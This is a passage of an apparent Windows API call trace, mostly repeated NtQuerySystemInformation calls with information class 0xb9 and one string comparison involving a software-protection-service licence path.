(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.359] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc70, Length=0x28, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb90, Length=0x20, ResultLength=0x0) [0228.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc50, Length=0x20, ResultLength=0x0) [0228.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) 